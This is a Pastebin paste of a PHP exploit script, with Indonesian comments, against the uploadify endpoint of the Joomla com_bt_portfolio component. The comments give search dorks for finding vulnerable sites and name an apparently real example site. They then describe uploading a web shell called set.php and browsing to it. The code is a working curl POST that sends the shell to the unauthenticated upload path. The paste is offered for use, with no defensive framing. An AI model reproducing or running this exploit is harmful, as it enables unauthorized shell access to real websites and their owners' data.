Advertisement
mickojavanese

Script Uploadify

May 29th, 2014
745
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. # Exploit uploadify pada component Joomla com_bt_portfolio
  2. # Exploit ini sama dengan exploit uploadify pada umumnya, yang berbeda cuma url exploitnya..
  3. # Shell yang kamu upload (dalam kasus ini saya beri nama set.php) harus 1 direktori dengan uploader ini.
  4. # Save script ini dengan ekstensi php, kemudian kamu tinggal jalankan di terminal (Linux) atau CMD (Windows)
  5. # Dork yang bisa kamu gunakan adalah "templates/bt_foto" & "/templates/bt_metro"
  6. # Misalkan situsnya seperti ini => http://greenclaws.co.uk/templates/bt_foto/
  7. # Kamu tinggal ubah saja menjadi => http://greenclaws.co.uk/administrator/components/com_bt_portfolio/helpers/uploadify/uploadify.php
  8. # Setelah itu kamu masukkan ke dalam script ini dan langsung aja eksekusi di terminal atau cmd
  9. # Kamu jalankan dengan perintah => php namafileini.php
  10. # Jika berhasil, maka akan muncul path shellnya seperti gambar berikut ini: http://i.imgur.com/Vrkdqzf.png
  11. # Kalau sudah seperti ini tinggal kamu buka di browser urlnya menjadi => http://greenclaws.co.uk/administrator/components/com_bt_portfolio/set.php
  12. #
  13. #
  14. # Spesial for INDONESIAN LAMER CREW (ILC) dan orang-orang yang menganggapku teman ^_^
  15.  
  16.  
  17.  
  18. $uploadfile="set.php";
  19. $ch =curl_init("situs.com/administrator/components/com_bt_portfolio/helpers/uploadify/uploadify.php");
  20. curl_setopt($ch, CURLOPT_POST, true);
  21. curl_setopt($ch, CURLOPT_POSTFIELDS,
  22. array('Filedata'=>"@$uploadfile",'folder'=>"/administrator/components/com_bt_portfolio/"));
  23. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  24. $postResult = curl_exec($ch);
  25. curl_close($ch);
  26. print "$postResult";
  27. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement